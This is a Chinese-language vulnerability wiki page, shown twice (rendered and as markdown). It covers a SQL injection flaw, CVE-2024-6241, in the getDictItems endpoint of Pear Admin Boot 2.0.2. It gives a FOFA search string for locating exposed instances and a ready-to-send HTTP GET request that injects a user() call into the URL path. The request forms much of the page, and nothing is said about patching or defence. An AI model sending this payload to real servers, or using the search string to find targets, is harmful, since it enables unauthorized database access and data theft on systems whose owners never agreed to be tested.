fofamini-wiki

登录白背景

源码

Pear Admin Boot系统getDictItems接口SQL注入漏洞（CVE-2024-6241）

一、漏洞描述

在Pear Admin Boot 2.0.2版本中发现了一个漏洞，并被列为严重漏洞。此问题影响文件/system/dictData/getDictItems/的getDictItems函数。输入,user(),1,1 的操作会导致SQL注入。

二、影响版本

Pear Admin Boot

三、资产测绘

"Pear Admin"

四、漏洞复现

GET /system/dictData/getDictItems/sys_user,user(),1 HTTP/1.1
Host: 
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Cookie: b-user-id=f9dd81a6-c7fb-f4d8-6875-41efe06a5d4f
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36

原文: https://www.yuque.com/xiaokp7/ocvun2/qvf5i6xill06iva4

# Pear Admin Boot系统getDictItems接口SQL注入漏洞（CVE-2024-6241）

### 一、漏洞描述
 在Pear Admin Boot 2.0.2版本中发现了一个漏洞，并被列为严重漏洞。此问题影响文件/system/dictData/getDictItems/的getDictItems函数。输入,user(),1,1 的操作会导致SQL注入。

### 二、影响版本
Pear Admin Boot

### 三、资产测绘
```plain
"Pear Admin"
```

![1720636924237-4383c579-d94c-4ad7-a2b5-913eada66aeb.png](./img/DUTAO14FW2h6q91c/1720636924237-4383c579-d94c-4ad7-a2b5-913eada66aeb-618015.png)

### 四、漏洞复现
```plain
GET /system/dictData/getDictItems/sys_user,user(),1 HTTP/1.1
Host: 
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Cookie: b-user-id=f9dd81a6-c7fb-f4d8-6875-41efe06a5d4f
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36

```

![1720636956997-25fcb5f2-a9da-4f92-8ad0-664dd0d703d3.png](./img/DUTAO14FW2h6q91c/1720636956997-25fcb5f2-a9da-4f92-8ad0-664dd0d703d3-345380.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qvf5i6xill06iva4>